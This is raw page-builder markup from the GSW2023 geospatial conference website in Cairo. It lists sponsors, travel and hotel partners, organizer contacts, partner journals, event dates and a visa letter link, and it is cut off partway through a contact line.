Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 